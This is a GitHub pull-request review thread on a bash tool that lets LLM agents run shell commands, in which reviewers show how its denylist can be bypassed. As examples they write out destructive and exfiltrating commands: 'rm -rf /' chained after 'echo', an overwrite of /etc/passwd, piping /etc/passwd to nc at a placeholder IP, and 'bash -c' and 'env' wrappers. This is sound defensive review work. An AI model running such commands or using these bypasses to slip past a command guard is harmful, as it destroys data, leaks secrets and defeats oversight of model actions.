feat: add bash tool #1056
Conversation
|
The PR description has been updated. Please fill out the template for your PR to be reviewed. |
planetf1
left a comment
There was a problem hiding this comment.
Thanks for the PR — the three-tier environment design (Static/Unsafe/LLMSandbox) follows code_interpreter cleanly, and reusing ExecutionResult is the right call.
Two security concerns need resolving before merge, plus a few smaller issues below.
UnsafeBashEnvironment validates argv but executes with shell=True
The safety checks parse the command with shlex.split() and inspect argv[0], then execute the original string with subprocess.run(command, shell=True, ...) (line 430). The shell processes the raw string, not the tokenised argv, so shell metacharacters bypass every check:
local_bash_executor("echo hi; rm -rf /")
# shlex.split → ['echo', 'hi;', 'sudo', 'rm', '-rf', '/']
# argv[0] = 'echo' — passes all checks
# shell runs: echo hi; rm -rf / ← both commands executeSame with redirects, pipes, and subshell substitution:
local_bash_executor("echo foo > /etc/passwd") # redirect, not a write_command
local_bash_executor("echo $(id)") # subshell, not in argv
local_bash_executor("cat /etc/passwd | nc x.x.x.x 4444") # exfilThe fix is to execute argv with shell=False. That way what you check is exactly what runs.
bash -c "..." isn't blocked
bash, sh, zsh etc. are in DANGEROUS_COMMANDS but only blocked when -i/--interactive/-l/-login appears. bash -c "sudo rm -rf /" passes:
shlex.split('bash -c "sudo rm -rf /"') → ['bash', '-c', 'sudo rm -rf /']
any(arg in ('-i', '--interactive', '-l', '-login') for arg in argv) # → FalseAny LLM-generated command can dodge the whole denylist with a bash -c "..." wrapper. test_safe_shell_commands_allowed intentionally locks this in as expected behaviour, so it would need updating too.
If you go the shell=False route above, you'd also want to block -c (and script-file arguments) on shell interpreters.
Other things worth fixing in the same pass:
BashEnvironment.__init__ accepts allowed_paths and stores it on self, but nothing in any of the three environment classes reads self.allowed_paths. Callers who pass it expecting path enforcement get nothing. Either wire it into the checks or drop the parameter.
LLMSandboxBashEnvironment validates working_dir statically but doesn't pass it to SandboxSession (line 552 — no working_dir arg). The Docker container runs with its own default cwd. bash_executor(cmd, working_dir="/project") silently ignores the restriction.
except subprocess.TimeoutExpired at line 569 is inside the llm-sandbox session block. llm-sandbox isn't subprocess, so this handler likely never fires — timeouts fall through to except Exception with a generic message. The interpreter.py pattern just uses except Exception as e and that's cleaner here.
The parse/validate preamble (shlex.split → empty check → three validator calls) is copy-pasted into all three execute() methods verbatim. Once the security issues are fixed, extracting it to BashEnvironment._validate() would make future changes a one-place edit.
docs/examples/tools/shell_example.py line 1: # pytest: unit, qualitative → should be # pytest: e2e, qualitative. unit is auto-applied by conftest and shouldn't be written explicitly; this example runs real subprocesses so e2e is the right tier.
Three unused imports in shell.py: tempfile, dataclass, Any — ruff will flag these as F401.
|
The Docker sandbox path ( The checks (lines 91–124) parse the command with ``` The Python docs cover this in the subprocess security considerations: pre-processing a string before passing it to a shell does not make it safe. The shell is the parser that matters. Two ways to fix this. Drop what direction would you plan to take? it feels like an unsafe bash execution is rather unsafe (though many tools do offer something). I wonder if it should not be allowed by default, and we need to be very clear on any limitations/security impact. |
|
Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up? |
ajbozarth
left a comment
There was a problem hiding this comment.
Some feedback from Claude. Also note Nigel's follow-up comment on UnsafeBashEnvironment still stands.
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
I'll address it as a follow-up. |
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
ajbozarth
left a comment
There was a problem hiding this comment.
All major concerns from the prior round are addressed. A few non-blocking follow-ups inline.
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
|
LGTM from my side once Angelo's inline comments are addressed. Thanks for filing the follow-up issues too. |
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
|
Updates look good, but I still don't get a successful result in the llm example: for comparison, before the last commit this was the result: |
|
Here is my case. LLM generates command with "find". it doesn't find any file anyway but it doesn't say "error". :-) |
ajbozarth
left a comment
There was a problem hiding this comment.
FYI the example failed for me until I set DOCKER_HOST. The Python docker SDK (used by llm-sandbox) doesn't read Docker CLI contexts and defaults to /var/run/docker.sock. That works on Docker Desktop (which symlinks the socket there) but not on colima, podman, or rootless setups, where users hit a cryptic FileNotFoundError(2, 'No such file or directory') with no pointer to the real fix.
Not blocking, but might be worth a note in the example docstring or a clearer skip-reason.
@ajbozarth It seems out of scope for this example commenting about docker setup. |
|
@planetf1 Would you approve this? |
planetf1
left a comment
There was a problem hiding this comment.
Thanks for the PR, Aki! The shlex.split/shell=False foundation is the right approach, and the environment abstraction is clean. I do have three security findings that need addressing before merge, plus a few correctness issues.
BLOCKERs (must fix before merge)
env-chain bypass:env -i sudo whoamiandenv rm -rf /tmp/testboth pass through the denylist_check_working_dir_restrictionis fail-open: an unresolvableworking_dirsilently grants access to all paths/private/varinDANGEROUS_PATHSblocks Python's standard temp directories on macOS
Warnings
- Shell operator substring check produces false positives (
grep a&&b file.txtis blocked) - Several normal operations are incorrectly blocked:
git config -f,git clean --dry-run,cp -r,make -f - Double truncation marker in
_LocalBashEnvironment.execute() repr()in the sandbox Python wrapper breaks if any argv element is aPathobject
Suggestion
- Truncation test oracle is always true and doesn't actually validate truncation
Details in the inline comments.
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
ajbozarth
left a comment
There was a problem hiding this comment.
Did a quick re-review after you addressed Nigels review about and my approval still stands
Tool PR
Use this template when adding or modifying components in
mellea/stdlib/tools/.Description
This PR adds bash tool. It has a fixed set configuration. The UX configuration will be in a separate PR.
Implementation Checklist
Protocol Compliance
convert_function_to_toolworksIntegration
mellea/stdlib/tools/__init__.pyor, if you are adding a library of components, from your sub-moduleTesting
tests/stdlib/tools/Attribution